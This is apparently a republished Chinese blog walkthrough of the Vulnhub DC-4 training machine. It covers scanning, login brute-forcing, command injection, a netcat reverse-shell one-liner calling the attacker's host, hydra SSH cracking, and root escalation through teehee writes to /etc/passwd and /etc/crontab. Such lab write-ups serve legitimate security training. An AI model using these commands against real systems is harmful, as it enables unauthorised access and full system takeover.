Vulnhub-DC-4靶機實戰-有解無憂

前言

靶機下載地址：https://www.vulnhub.com/entry/dc-4,313/

KALI地址：192.168.75.108

靶機地址：192.168.75.207

一.資訊發現

1.主機發現

使用命令如下

netdiscover -r 192.168.75.108

如下圖，發現了我們靶機的地址，

2.主機掃描

這里使用nmap工具進行掃描，命令如下，

nmap -A -T4 -O -p 0-65535 192.168.75.207

掃描結果如下，發現開放了80,22號埠，

3.目錄掃描

既然開放了80埠，那么我們就可以二話不說直接開始目錄掃描，命令如下，

dirb http://192.168.75.207

掃描結果如下圖，發現并沒有什么可以利用的點，

4.網頁資訊收集

既然開放了，80埠，我們可以直接去訪問，如下圖，打開首頁發現是一個登錄框，我們可以嘗試登錄，隨后又抽卡了源代碼，網路資訊，均沒有發現可以利用的點，

二.漏洞利用

經過上面資訊收集，發現了首頁是可以登錄的，并且沒有驗證碼，試過了SQL注入，不行，嘗試弱密碼爆破，

爆破結果如下，發現密碼可能是happy，

經過測驗發現就是happy，如下圖，并且成功登錄進去，

1.命令執行

經過發現，發現可以執行命令，如下圖，想法是是否可以嘗試繞過，執行其他命令，

這里就可以使用bp進行抓包，然后進行繞過，如下圖

下面是輸出結果，如下圖，

所以我們就有了思路，一個思路是，讓靶機下載我們的webshell，然后我們連接，第二個思路是反彈shell，

2.反彈shell

簡單的說一下第一種思路，經過測驗，發現靶機沒有wget的下載權限，就放棄了，直接來到第二個思路也就是反彈shell的思路，

這里在靶機使用的命令是rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.75.108 6666 > /tmp/f;，

然后在kali里面使用nc命令來進行監聽，命令如下，

nc -lnvp 6666

如下圖效果開始監聽，

這里說一下歷程，按照正常來說，像如下圖一樣發包就可以直接反彈成功了，但是發送了，就是沒有反彈，看了大佬的博客才知道不能這樣發包，

所以我們需要在前端修改代碼，才能成功反彈，如下圖查看源代碼修改即可,然后點擊run運行就可以直接成功反彈shell了，

如下圖，KALI成功接收反彈，

三.提權

1.獲取jim賬戶密碼

先按照如下圖操作，先查看自己是什么用戶和ID，然后使用python更換終端，

然后我們可以查看/etc/passwd下面的用戶，如下圖，發現了，三個用戶，一個是jim，一個是charles,一個是sam，

然后經過查找，發現在home目錄下面發現了幾個人的目錄路徑，如下圖，

經過測驗發現，在jim目錄下面，發現了老密碼的字樣，我們直接打開看，

如下圖，打開全是密碼，這里的思路，這么多密碼，肯定要試試暴力破解了，這里我們把密碼復制進去文本

我們這里使用hydra工具來進行暴力破解ssh，使用命令如下，

hydra -l jim -P pass.txt -s 22 ssh://192.168.75.207 -vV

-l #對應的是一個用戶，如果是大寫的-L就是用戶本
-P #對應的是一個密碼本，如果是小p那么就是一個密碼
-s #對應的是埠
-vV #顯示破解程序

如下圖破解成功，成功發現jim的密碼，

賬戶：jim

密碼：jibril04

但是經過測驗發現jim這個賬戶啥也不能干啊，

2.獲取Charles賬戶密碼

經過一番查找在/var/mail下面發現了一封郵件，郵件內容如下圖，發現是密碼，

我們可以嘗試登錄一下查看，如下圖，發現可以登錄，然后我們查看是否有sudo權限，我們直接使用如下命令查看，

sudo -l

發現有teeche的命令執行權限，如下圖，

3.執行提權操作

因為不熟悉teehee的提權方式，所以不怎么熟悉，就查了一下資料，這里有兩種方法可以提權，第一種就是在/etc/passwd下面添加用戶

第二種方法就是在linux的自動任務執行里面進行利用，

1.在/etc/passwd添加用戶

首先需要執行一個命令perl -le 'print crypt("123456", "ken")，如下圖，

然后就可以執行一個命令來進行添加用戶，命令如下，

echo "takagisan:keNdbTFs2CPY6:0:0:::/bin/bash" | sudo teehee -a /etc/passwd

然后如下圖，報錯失敗，查了一下資料之后，發現需要第一次登錄root用戶在退出來就可以了，所以我這里直接換其他的提權方式了，

2.創建定時任務給提權

看了一下大佬的博客，發現是這樣的，創建一個定時人物然后給/bin/sh賦予SUID的權限，然后用teehee命令這個定時任務，寫到/etc/crontab里面去，

命令如下，

echo "* * * * * root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

crontab命令詳解可以百度查資料，

這樣之后我們就可以直接在控制臺里面輸入/bin/sh就可以了，如下圖提權成功，

然后我們就可以去查看flag了，如下圖，在root目錄發現flag，

四.總結

需要注意查看var下面的mail郵件目錄，然后提權需要注意teehee提權方式，還需要多注意查看各種敏感目錄，和檔案，

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/466003.html

標籤：其他

上一篇：OpenHarmony技術日全面解讀3.1 Release版本，系統基礎能力再升級

下一篇：在 WebGPU 的片元著色器中訪問幀緩沖坐標